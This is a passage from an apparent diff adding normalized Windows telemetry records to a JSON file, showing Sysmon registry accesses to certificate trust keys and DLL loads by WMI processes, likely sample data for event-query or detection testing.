"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + 
"image_name": "ktmw32.dll", + "image_path": "C:\\Windows\\System32\\ktmw32.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "resutils.dll", + "image_path": "C:\\Windows\\System32\\resutils.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 
131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "resutils.dll", + "image_path": "C:\\Windows\\System32\\resutils.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 
131883573481670000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "wbemcomn.dll", + "image_path": "C:\\Windows\\System32\\wbemcomn.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", 